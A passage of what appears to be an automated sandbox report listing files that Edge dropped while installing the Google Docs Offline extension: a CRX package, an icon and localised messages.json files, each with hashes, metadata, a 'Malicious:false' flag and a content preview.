                                                                                                                                                                                                                                                                                                                            Preview:Cr24..............0.."0...*.H.............0.........N.......E#......9e.u.q...VYY..@.+.C..k.O..bK.`..6.G..%.....3Z...e _.6....F..1p..K.Z......./ .3...OT..`..0...Y...FT..43.th.y...}....p.L...2S.&i.`..o...f.oH.....N..:..ijT.3.F{.0.,.f?'f.CQt;b_"Pc.. ..~S.I.c.8Z.;.....{G.a......k...>.`.o..%.$>;.....g.............jg?.R..@.:..........&..{...x@.Py..;kT....%F".S..w...N....9...A..@X.t!i.@..1;......1E..X.....[.~$....J......;=T.;)k..Y...$......S......M.P..P..>..=..u.....2p...w.9..1qw.a\A..Vj .C.....A..Cf1.r6.A...L. _m...[..l.Wr_../.. .B..9!.!+..ZG.K.......0.."0...*.H.............0.........^SUd%Q.L].......Cl2o...\[.....'*...;R=....N.C5....d. .....J.C>u.kr..Y..syJC.XS.q..E.n?....(G.5..)2.G..!.M.SS.{..U....!.EE..M[.#qs.A.1...g)nQ.c..G....Bd..7... .O.BI..KXQ..4.d.K.0......g.....-p....Z.E{...M&.~n.TE7..{0....5.#.C+3.y)pd9.e.........@..3.9..B.....I....2nX........2.?.~..S....]G.N.....Lr.O.Ve....9..D1.G..W)...P.?=.#..7.R.lz..a.wX.e..h.h.~....v..RP.@X....d.G

                                                                                                                                                                                                                                                                                                                            C:\Users\user\AppData\Local\Temp\ef377577-a577-4383-abae-014751f0def8.tmp

                                                                                                                                                                                                                                                                                                                            Download File
                                                                                                                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                            File Type:Google Chrome extension, version 3
                                                                                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                                                                                            Size (bytes):154477
                                                                                                                                                                                                                                                                                                                            Entropy (8bit):7.835886983924039
                                                                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                                                                            SSDEEP:3072:edP3YiyHk53xr3zWwaFYgn5JFug0HjaHNK7XeSD/r/pLbWNiOAo1np:edPYJHAzyVu7HjacuSD/rBPBOJnp
                                                                                                                                                                                                                                                                                                                            MD5:14937B985303ECCE4196154A24FC369A
                                                                                                                                                                                                                                                                                                                            SHA1:ECFE89E11A8D08CE0C8745FF5735D5EDAD683730
                                                                                                                                                                                                                                                                                                                            SHA-256:71006A5311819FEF45C659428944897184880BCDB571BF68C52B3D6EE97682FF
                                                                                                                                                                                                                                                                                                                            SHA-512:1D03C75E4D2CD57EEE7B0E93E2DE293B41F280C415FB2446AC234FC5AFD11FE2F2FCC8AB9843DB0847C2CE6BD7DF7213FCF249EA71896FBF6C0696E3F5AEE46C
                                                                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                                                                            Preview:Cr24..............0.."0...*.H.............0.........^...1"...w.g..t..2J.G1.)X4..=&.?[j,Lz..j.u.e[I.q*Ba/X...P.h..L.....2%3_o.......H.)'.=.e...?.......j..3UH.|.X.M..u..s[.*..?$....F%....I....)..,-./.e5).f..O.q.^........9..(.._.ph2..^.YBPXf_8....h[.v...S.*1`.#..5.SF.:f-.#.65.i..b.]9...y2.'....k[........%0............G.m.}...CG.....a.s.:.S..QiI.fT.k.MdOF.2....D...v`m...M.7'.R.d...8....2..~.<w8!.W..Sg.._A6.(.pC..w.=..!..7h!J...].....3......Kf..k...|....6./.p.....A....e.1.y.<~Mu..+(v8W........?=.V+.Gb&...u8)...=Qt...... ......x.}.f..&X.SN9e..L....[0Y0...*.H.=....*.H.=....B..............r...2..+Y.I...k..bR.j5Sl..8.......H"i.-l..`.Q.{...G0E.!....~..E...Au.C.q..y.?2An.a..Zn}. H~.vtgI...o.|.j.e....p.........".&...........Z]o.H..+..zF.......S.E}@.F..".P`...3......jW....H.H...:..8.......<...........Z.e.>..vV.......J.,/.X.....?.%.....6....m#.u].Z...[.s.M_...J.."9l..l...,|.....r...QC.....4:....wj.O...5....s.n.%.....y....c.....#F........)gv(..!S

                                                                                                                                                                                                                                                                                                                            C:\Users\user\AppData\Local\Temp\scoped_dir8084_1692992768\CRX_INSTALL\128.png

                                                                                                                                                                                                                                                                                                                            Download File
                                                                                                                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                            File Type:PNG image data, 128 x 128, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                                                                                            Size (bytes):4982
                                                                                                                                                                                                                                                                                                                            Entropy (8bit):7.929761711048726
                                                                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                                                                            SSDEEP:96:L7Rf7U1ylWb3KfyEfOXE+PIcvBirQFiAql1ZwKREkXCSAk:pTvWqfD+gl0sAql1u7kySAk
                                                                                                                                                                                                                                                                                                                            MD5:913064ADAAA4C4FA2A9D011B66B33183
                                                                                                                                                                                                                                                                                                                            SHA1:99EA751AC2597A080706C690612AEEEE43161FC1
                                                                                                                                                                                                                                                                                                                            SHA-256:AFB4CE8882EF7AE80976EBA7D87F6E07FCDDC8E9E84747E8D747D1E996DEA8EB
                                                                                                                                                                                                                                                                                                                            SHA-512:162BF69B1AD5122C6154C111816E4B87A8222E6994A72743ED5382D571D293E1467A2ED2FC6CC27789B644943CF617A56DA530B6A6142680C5B2497579A632B5
                                                                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                                                                            Preview:.PNG........IHDR..............>a....=IDATx..]}...U..;...O.Q..QH.I(....v..E....GUb*..R[.4@%..hK..B..(.B..". ....&)U#.%...jZ...JC.8.....{.cfvgf.3;.....}ow.....{...P.B...*T.P.B...*Tx...=.Q..wv.w.....|.e.1.$.P.?..l_\.n.}...~.g.....Q...A.f....m.....{,...C2 %..X.......FE.1.N..f...Q..D.K87.....:g..Q.{............3@$.8.....{.....q....G.. .....5..y......)XK..F...D.......... ."8...J#.eM.i....H.E.....a.RIP.`......)..T.....! .[p`X.`..L.a....e. .T..2.....H..p$..02...j....\..........s{...Ymm~.a........f.$./.[.{..C.2:.0..6..]....`....NW.....0..o.T..$;k.2......_...k..{,.+........{..6...L..... .dw...l$..}...K...EV....0......P...e....k....+Go....qw.9.1...X2\..qfw0v.....N...{...l.."....f.A..I..+#.v....'..~E.N-k.........{...l.$..ga..1...$......x$X=}.N..S..B$p..`..`.ZG:c..RA.(.0......Gg.A.I..>...3u.u........_..KO.m.........C...,..c.......0...@_..m...-..7.......4LZ......j@.......\..'....u. QJ.:G..I`.w'B0..w.H..'b.0- ......|..}./.....e..,.K.1........W.u.v. ...\.o

                                                                                                                                                                                                                                                                                                                            C:\Users\user\AppData\Local\Temp\scoped_dir8084_1692992768\CRX_INSTALL\_locales\af\messages.json

                                                                                                                                                                                                                                                                                                                            Download File
                                                                                                                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                                                                                            Size (bytes):908
                                                                                                                                                                                                                                                                                                                            Entropy (8bit):4.512512697156616
                                                                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                                                                            SSDEEP:12:1HASvgMTCBxNB+kCIww3v+BBJ/wjsV8lCBxeBeRiGTCSU8biHULaBg/4srCBhUJJ:1HAkkJ+kCIwEg/wwbw0PXa22QLWmSDg
                                                                                                                                                                                                                                                                                                                            MD5:12403EBCCE3AE8287A9E823C0256D205
                                                                                                                                                                                                                                                                                                                            SHA1:C82D43C501FAE24BFE05DB8B8F95ED1C9AC54037
                                                                                                                                                                                                                                                                                                                            SHA-256:B40BDE5B612CFFF936370B32FB0C58CC205FC89937729504C6C0B527B60E2CBA
                                                                                                                                                                                                                                                                                                                            SHA-512:153401ECDB13086D2F65F9B9F20ACB3CEFE5E2AEFF1C31BA021BE35BF08AB0634812C33D1D34DA270E5693A8048FC5E2085E30974F6A703F75EA1622A0CA0FFD
                                                                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                                                                            Preview:{.. "createnew": {.. "message": "SKEP NUWE".. },.. "explanationofflinedisabled": {.. "message": "Jy is vanlyn. As jy Google Dokumente sonder 'n internetverbinding wil gebruik, moet jy die volgende keer as jy aan die internet gekoppel is na instellings op die Google Dokumente-tuisblad gaan en vanlynsinkronisering aanskakel.".. },.. "explanationofflineenabled": {.. "message": "Jy is vanlyn, maar jy kan nog steeds beskikbare l.ers redigeer of nuwes skep.".. },.. "extdesc": {.. "message": "Skep, wysig en bekyk jou dokumente, sigblaaie en aanbiedings . alles sonder toegang tot die internet.".. },.. "extname": {.. "message": "Google Vanlyn Dokumente".. },.. "learnmore": {.. "message": "Kom meer te wete".. },.. "popuphelptext": {.. "message": "Skryf, redigeer en werk saam, waar jy ook al is, met of sonder 'n internetverbinding.".. }..}..

                                                                                                                                                                                                                                                                                                                            C:\Users\user\AppData\Local\Temp\scoped_dir8084_1692992768\CRX_INSTALL\_locales\am\messages.json

                                                                                                                                                                                                                                                                                                                            Download File
                                                                                                                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                                                                                            Size (bytes):1285
                                                                                                                                                                                                                                                                                                                            Entropy (8bit):4.702209356847184
                                                                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                                                                            SSDEEP:24:1HAn6bfEpxtmqMI91ivWjm/6GcCIoToCZzlgkX/Mj:W6bMt3MITFjm/Pcd4oCZhg6k
                                                                                                                                                                                                                                                                                                                            MD5:9721EBCE89EC51EB2BAEB4159E2E4D8C
                                                                                                                                                                                                                                                                                                                            SHA1:58979859B28513608626B563138097DC19236F1F
                                                                                                                                                                                                                                                                                                                            SHA-256:3D0361A85ADFCD35D0DE74135723A75B646965E775188F7DCDD35E3E42DB788E
                                                                                                                                                                                                                                                                                                                            SHA-512:FA3689E8663565D3C1C923C81A620B006EA69C99FB1EB15D07F8F45192ED9175A6A92315FA424159C1163382A3707B25B5FC23E590300C62CBE2DACE79D84871
                                                                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                                                                            Preview:{.. "createnew": {.. "message": "... ...".. },.. "explanationofflinedisabled": {.. "message": "..... .. .... Google ..... ........ ..... ..... .Google .... ... .. .. .. ..... .... ....... .. ....... ... .. .. ..... .. ..... ....".. },.. "explanationofflineenabled": {.. "message": "..... .. .... ... .. .... .... ..... .... ... ..... .... .....".. },.. "extdesc": {.. "message": "...... ..... .... ... .. ..... ...... ..... .... .. ..... . .... .. ...... .....".. },.. "extname": {.. "message": "..... .. Goog

                                                                                                                                                                                                                                                                                                                            C:\Users\user\AppData\Local\Temp\scoped_dir8084_1692992768\CRX_INSTALL\_locales\ar\messages.json

                                                                                                                                                                                                                                                                                                                            Download File
                                                                                                                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                                                                                            Size (bytes):1244
                                                                                                                                                                                                                                                                                                                            Entropy (8bit):4.5533961615623735
                                                                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                                                                            SSDEEP:12:1HASvgPCBxNhieFTr9ogjIxurIyJCCBxeh6wAZKn7uCSUhStuysUm+WCBhSueW1Y:1HAgJzoaC6VEn7Css8yoXzzd
                                                                                                                                                                                                                                                                                                                            MD5:3EC93EA8F8422FDA079F8E5B3F386A73
                                                                                                                                                                                                                                                                                                                            SHA1:24640131CCFB21D9BC3373C0661DA02D50350C15
                                                                                                                                                                                                                                                                                                                            SHA-256:ABD0919121956AB535E6A235DE67764F46CFC944071FCF2302148F5FB0E8C65A
                                                                                                                                                                                                                                                                                                                            SHA-512:F40E879F85BC9B8120A9B7357ED44C22C075BF065F45BEA42BD5316AF929CBD035D5D6C35734E454AEF5B79D378E51A77A71FA23F9EBD0B3754159718FCEB95C
                                                                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                                                                            Preview:{.. "createnew": {.. "message": "..... ....".. },.. "explanationofflinedisabled": {.. "message": "... ... ...... ........ ....... Google ... ..... .......... ..... ... ......... .. ...... ........ ........ Google ..... ........ ... ..... .. ..... ....... .... .... .... ..........".. },.. "explanationofflineenabled": {.. "message": "... ... ...... .... .. .... ....... ..... ....... ....... .. ..... ..... ......".. },.. "extdesc": {.. "message": "..... ......... ...... ........ ....... ......... ........ ....... .. ... ... ..... .........".. },.. "extname": {.. "message": "....... Google ... ......".. },.. "learnmore": {.. "messa

                                                                                                                                                                                                                                                                                                                            C:\Users\user\AppData\Local\Temp\scoped_dir8084_1692992768\CRX_INSTALL\_locales\az\messages.json

                                                                                                                                                                                                                                                                                                                            Download File
                                                                                                                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                                                                                            Size (bytes):977
                                                                                                                                                                                                                                                                                                                            Entropy (8bit):4.867640976960053
                                                                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                                                                            SSDEEP:24:1HAWNjbwlmyuAoW32Md+80cVLdUSERHtRo3SjX:J3wlzs42m+8TV+S4H0CjX
                                                                                                                                                                                                                                                                                                                            MD5:9A798FD298008074E59ECC253E2F2933
                                                                                                                                                                                                                                                                                                                            SHA1:1E93DA985E880F3D3350FC94F5CCC498EFC8C813
                                                                                                                                                                                                                                                                                                                            SHA-256:628145F4281FA825D75F1E332998904466ABD050E8B0DC8BB9B6A20488D78A66
                                                                                                                                                                                                                                                                                                                            SHA-512:9094480379F5AB711B3C32C55FD162290CB0031644EA09A145E2EF315DA12F2E55369D824AF218C3A7C37DD9A276AEEC127D8B3627D3AB45A14B0191ED2BBE70
                                                                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                                                                            Preview:{.. "createnew": {.. "message": "YEN.S.N. YARADIN".. },.. "explanationofflinedisabled": {.. "message": "Oflayns.n.z. Google S.n.di internet ba.lant.s. olmadan istifad. etm.k ist.yirsinizs., Google S.n.din .sas s.hif.sind. ayarlara gedin v. n.vb.ti d.f. internet. qo.ulanda oflayn sinxronizasiyan. aktiv edin.".. },.. "explanationofflineenabled": {.. "message": "Oflayns.n.z, amma m.vcud fayllar. redakt. ed. v. yenil.rini yarada bil.rsiniz.".. },.. "extdesc": {.. "message": "S.n.d, c.dv.l v. t.qdimatlar.n ham.s.n. internet olmadan redakt. edin, yarad.n v. bax.n.".. },.. "extname": {.. "message": "Google S.n.d Oflayn".. },.. "learnmore": {.. "message": ".trafl. M.lumat".. },.. "popuphelptext": {.. "message": "Harda olma..n.zdan v. internet. qo.ulu olub-olmad...n.zdan as.l. olmayaraq, yaz.n, redakt. edin v. .m.kda.l.q edin.".. }..}..

                                                                                                                                                                                                                                                                                                                            C:\Users\user\AppData\Local\Temp\scoped_dir8084_1692992768\CRX_INSTALL\_locales\be\messages.json

                                                                                                                                                                                                                                                                                                                            Download File
                                                                                                                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                                                                                            Size (bytes):3107
                                                                                                                                                                                                                                                                                                                            Entropy (8bit):3.535189746470889
                                                                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                                                                            SSDEEP:48:YOWdTQ0QRk+QyJQAy6Qg4QWSe+QECTQLHQlQIfyQ0fnWQjQDrTQik+QvkZTQ+89b:GdTbyRvwgbCTEHQhyVues9oOT3rOCkV
                                                                                                                                                                                                                                                                                                                            MD5:68884DFDA320B85F9FC5244C2DD00568
                                                                                                                                                                                                                                                                                                                            SHA1:FD9C01E03320560CBBB91DC3D1917C96D792A549
                                                                                                                                                                                                                                                                                                                            SHA-256:DDF16859A15F3EB3334D6241975CA3988AC3EAFC3D96452AC3A4AFD3644C8550
                                                                                                                                                                                                                                                                                                                            SHA-512:7FF0FBD555B1F9A9A4E36B745CBFCAD47B33024664F0D99E8C080BE541420D1955D35D04B5E973C07725573E592CD0DD84FDBB867C63482BAFF6929ADA27CCDE
                                                                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                                                                            Preview:{"createnew":{"message":"\u0421\u0422\u0412\u0410\u0420\u042b\u0426\u042c \u041d\u041e\u0412\u042b"},"explanationofflinedisabled":{"message":"\u0412\u044b \u045e \u043f\u0430\u0437\u0430\u0441\u0435\u0442\u043a\u0430\u0432\u044b\u043c \u0440\u044d\u0436\u044b\u043c\u0435. \u041a\u0430\u0431 \u043a\u0430\u0440\u044b\u0441\u0442\u0430\u0446\u0446\u0430 \u0414\u0430\u043a\u0443\u043c\u0435\u043d\u0442\u0430\u043c\u0456 Google \u0431\u0435\u0437 \u043f\u0430\u0434\u043a\u043b\u044e\u0447\u044d\u043d\u043d\u044f \u0434\u0430 \u0456\u043d\u0442\u044d\u0440\u043d\u044d\u0442\u0443, \u043f\u0435\u0440\u0430\u0439\u0434\u0437\u0456\u0446\u0435 \u0434\u0430 \u043d\u0430\u043b\u0430\u0434 \u043d\u0430 \u0433\u0430\u043b\u043e\u045e\u043d\u0430\u0439 \u0441\u0442\u0430\u0440\u043e\u043d\u0446\u044b \u0414\u0430\u043a\u0443\u043c\u0435\u043d\u0442\u0430\u045e Google \u0456 \u045e\u043a\u043b\u044e\u0447\u044b\u0446\u0435 \u0441\u0456\u043d\u0445\u0440\u0430\u043d\u0456\u0437\u0430\u0446\u044b\u044e

                                                                                                                                                                                                                                                                                                                            C:\Users\user\AppData\Local\Temp\scoped_dir8084_1692992768\CRX_INSTALL\_locales\bg\messages.json

                                                                                                                                                                                                                                                                                                                            Download File
                                                                                                                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                                                                                            Size (bytes):1389
                                                                                                                                                                                                                                                                                                                            Entropy (8bit):4.561317517930672
                                                                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                                                                            SSDEEP:24:1HAp1DQqUfZ+Yann08VOeadclUZbyMzZzsYvwUNn7nOyRK8/nn08V7:g1UTfZ+Ya08Uey3tflCRE08h
                                                                                                                                                                                                                                                                                                                            MD5:2E6423F38E148AC5A5A041B1D5989CC0
                                                                                                                                                                                                                                                                                                                            SHA1:88966FFE39510C06CD9F710DFAC8545672FFDCEB
                                                                                                                                                                                                                                                                                                                            SHA-256:AC4A8B5B7C0B0DD1C07910F30DCFBDF1BCB701CFCFD182B6153FD3911D566C0E
                                                                                                                                                                                                                                                                                                                            SHA-512:891FCDC6F07337970518322C69C6026896DD3588F41F1E6C8A1D91204412CAE01808F87F9F2DEA1754458D70F51C3CEF5F12A9E3FC011165A42B0844C75EC683
                                                                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                                                                            Preview:{.. "createnew": {.. "message": ".........".. },.. "explanationofflinedisabled": {.. "message": "...... .... .. .. .......... Google ......... ... ........ ......, ........ ........... . ......... ........ .. Google ......... . ........ ...... .............. ......... ..., ...... ..... ...... . .........".. },.. "explanationofflineenabled": {.. "message": "...... ..., .. ... ...... .. ........... ......... ....... ... .. ......... .....".. },.. "extdesc": {.. "message": "............, .......... . ............ ...... ........., .......... ....... . ........... . ...... .... ... ...... .. .........".. },..

                                                                                                                                                                                                                                                                                                                            C:\Users\user\AppData\Local\Temp\scoped_dir8084_1692992768\CRX_INSTALL\_locales\bn\messages.json

                                                                                                                                                                                                                                                                                                                            Download File
                                                                                                                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                                                                                            Size (bytes):1763
                                                                                                                                                                                                                                                                                                                            Entropy (8bit):4.25392954144533
                                                                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                                                                            SSDEEP:24:1HABGtNOtIyHmVd+q+3X2AFl2DhrR7FAWS9+SMzI8QVAEq8yB0XtfOyvU7D:oshmm/+H2Ml2DrFPS9+S99EzBd7D
                                                                                                                                                                                                                                                                                                                            MD5:651375C6AF22E2BCD228347A45E3C2C9
                                                                                                                                                                                                                                                                                                                            SHA1:109AC3A912326171D77869854D7300385F6E628C
                                                                                                                                                                                                                                                                                                                            SHA-256:1DBF38E425C5C7FC39E8077A837DF0443692463BA1FBE94E288AB5A93242C46E
                                                                                                                                                                                                                                                                                                                            SHA-512:958AA7CF645FAB991F2ECA0937BA734861B373FB1C8BCC001599BE57C65E0917F7833A971D93A7A6423C5F54A4839D3A4D5F100C26EFA0D2A068516953989F9D
                                                                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                                                                            Preview:{.. "createnew": {.. "message": ".... .... ....".. },.. "explanationofflinedisabled": {.. "message": ".... ....... ....... .... ......... ..... ..... Google ........ ....... ...., Google .......... ........ ....... ... ... .... ... .... ... ........... .... ....... .... ... ...... ..... .... .....".. },.. "explanationofflineenabled": {.. "message": ".... ....... ......, ...... .... .... ...... .......... ........ .... .. .... .... .... .... .......".. },.. "extdesc":

                                                                                                                                                                                                                                                                                                                            C:\Users\user\AppData\Local\Temp\scoped_dir8084_1692992768\CRX_INSTALL\_locales\ca\messages.json

                                                                                                                                                                                                                                                                                                                            Download File
                                                                                                                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                                                                                            Size (bytes):930
                                                                                                                                                                                                                                                                                                                            Entropy (8bit):4.569672473374877
                                                                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                                                                            SSDEEP:12:1HASvggoSCBxNFT0sXuqgEHQ2fTq9blUJYUJaw9CBxejZFPLOjCSUuE44pMiiDat:1HAtqs+BEHGpURxSp1iUPWCAXtRKe
                                                                                                                                                                                                                                                                                                                            MD5:D177261FFE5F8AB4B3796D26835F8331
                                                                                                                                                                                                                                                                                                                            SHA1:4BE708E2FFE0F018AC183003B74353AD646C1657
                                                                                                                                                                                                                                                                                                                            SHA-256:D6E65238187A430FF29D4C10CF1C46B3F0FA4B91A5900A17C5DFD16E67FFC9BD
                                                                                                                                                                                                                                                                                                                            SHA-512:E7D730304AED78C0F4A78DADBF835A22B3D8114FB41D67B2B26F4FE938B572763D3E127B7C1C81EBE7D538DA976A7A1E7ADC40F918F88AFADEA2201AE8AB47D0
                                                                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                                                                            Preview:{.. "createnew": {.. "message": "CREA'N UN DE NOU".. },.. "explanationofflinedisabled": {.. "message": "No tens connexi.. Per utilitzar Documents de Google sense connexi. a Internet, ves a la configuraci. de la p.gina d'inici d'aquest servei i activa l'opci. per sincronitzar-se sense connexi. la propera vegada que estiguis connectat a la xarxa.".. },.. "explanationofflineenabled": {.. "message": "Tot i que no tens connexi., pots editar o crear fitxers.".. },.. "extdesc": {.. "message": "Edita, crea i consulta documents, fulls de c.lcul i presentacions, tot sense acc.s a Internet.".. },.. "extname": {.. "message": "Documents de Google sense connexi.".. },.. "learnmore": {.. "message": "M.s informaci.".. },.. "popuphelptext": {.. "message": "Escriu text, edita fitxers i col.labora-hi siguis on siguis, amb o sense connexi. a Internet.".. }..}..

                                                                                                                                                                                                                                                                                                                            C:\Users\user\AppData\Local\Temp\scoped_dir8084_1692992768\CRX_INSTALL\_locales\cs\messages.json

                                                                                                                                                                                                                                                                                                                            Download File
                                                                                                                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                                                                                            Size (bytes):913
                                                                                                                                                                                                                                                                                                                            Entropy (8bit):4.947221919047
                                                                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                                                                            SSDEEP:12:1HASvgdsbCBxNBmobXP15Dxoo60n40h6qCBxeBeGG/9jZCSUKFPDLZ2B2hCBhPLm:1HApJmoZ5e50nzQhwAd7dvYB2kDSGGKs
                                                                                                                                                                                                                                                                                                                            MD5:CCB00C63E4814F7C46B06E4A142F2DE9
                                                                                                                                                                                                                                                                                                                            SHA1:860936B2A500CE09498B07A457E0CCA6B69C5C23
                                                                                                                                                                                                                                                                                                                            SHA-256:21AE66CE537095408D21670585AD12599B0F575FF2CB3EE34E3A48F8CC71CFAB
                                                                                                                                                                                                                                                                                                                            SHA-512:35839DAC6C985A6CA11C1BFF5B8B5E59DB501FCB91298E2C41CB0816B6101BF322445B249EAEA0CEF38F76D73A4E198F2B6E25EEA8D8A94EA6007D386D4F1055
                                                                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                                                                            Preview:{.. "createnew": {.. "message": "VYTVO.IT".. },.. "explanationofflinedisabled": {.. "message": "Jste offline. Pokud chcete Dokumenty Google pou..vat bez p.ipojen. k.internetu, a. budete p...t. online, p.ejd.te do nastaven. na domovsk. str.nce Dokument. Google a.zapn.te offline synchronizaci.".. },.. "explanationofflineenabled": {.. "message": "Jste offline, ale st.le m..ete upravovat dostupn. soubory nebo vytv..et nov..".. },.. "extdesc": {.. "message": "Upravujte, vytv..ejte a.zobrazujte sv. dokumenty, tabulky a.prezentace . v.e bez p..stupu k.internetu.".. },.. "extname": {.. "message": "Dokumenty Google offline".. },.. "learnmore": {.. "message": "Dal.. informace".. },.. "popuphelptext": {.. "message": "Pi.te, upravujte a.spolupracujte kdekoli, s.p.ipojen.m k.internetu i.bez n.j.".. }..}..

                                                                                                                                                                                                                                                                                                                            C:\Users\user\AppData\Local\Temp\scoped_dir8084_1692992768\CRX_INSTALL\_locales\cy\messages.json

                                                                                                                                                                                                                                                                                                                            Download File
                                                                                                                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                                                                                            Size (bytes):806
                                                                                                                                                                                                                                                                                                                            Entropy (8bit):4.815663786215102
                                                                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                                                                            SSDEEP:12:YGo35xMxy6gLr4Dn1eBVa1xzxyn1VFQB6FDVgdAJex9QH7uy+XJEjENK32J21j:Y735+yoeeRG54uDmdXx9Q7u3r83Xj
                                                                                                                                                                                                                                                                                                                            MD5:A86407C6F20818972B80B9384ACFBBED
                                                                                                                                                                                                                                                                                                                            SHA1:D1531CD0701371E95D2A6BB5EDCB79B949D65E7C
                                                                                                                                                                                                                                                                                                                            SHA-256:A482663292A913B02A9CDE4635C7C92270BF3C8726FD274475DC2C490019A7C9
                                                                                                                                                                                                                                                                                                                            SHA-512:D9FBF675514A890E9656F83572208830C6D977E34D5744C298A012515BC7EB5A17726ADD0D9078501393BABD65387C4F4D3AC0CC0F7C60C72E09F336DCA88DE7
                                                                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                                                                            Preview:{"createnew":{"message":"CREU NEWYDD"},"explanationofflinedisabled":{"message":"Rydych chi all-lein. I ddefnyddio Dogfennau Google heb gysylltiad \u00e2'r rhyngrwyd, ewch i'r gosodiadau ar dudalen hafan Dogfennau Google a throi 'offine sync' ymlaen y tro nesaf y byddwch wedi'ch cysylltu \u00e2'r rhyngrwyd."},"explanationofflineenabled":{"message":"Rydych chi all-lein, ond gallwch barhau i olygu'r ffeiliau sydd ar gael neu greu rhai newydd."},"extdesc":{"message":"Gallwch olygu, creu a gweld eich dogfennau, taenlenni a chyflwyniadau \u2013 i gyd heb fynediad i'r rhyngrwyd."},"extname":{"message":"Dogfennau Google All-lein"},"learnmore":{"message":"DYSGU MWY"},"popuphelptext":{"message":"Ysgrifennwch, golygwch a chydweithiwch lle bynnag yr ydych, gyda chysylltiad \u00e2'r rhyngrwyd neu hebddo."}}.

                                                                                                                                                                                                                                                                                                                            C:\Users\user\AppData\Local\Temp\scoped_dir8084_1692992768\CRX_INSTALL\_locales\da\messages.json

                                                                                                                                                                                                                                                                                                                            Download File
                                                                                                                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                                                                                            Size (bytes):883
                                                                                                                                                                                                                                                                                                                            Entropy (8bit):4.5096240460083905
                                                                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                                                                            SSDEEP:24:1HA4EFkQdUULMnf1yo+9qgpukAXW9bGJTvDyqdr:zEFkegfw9qwAXWNs/yu
                                                                                                                                                                                                                                                                                                                            MD5:B922F7FD0E8CCAC31B411FC26542C5BA
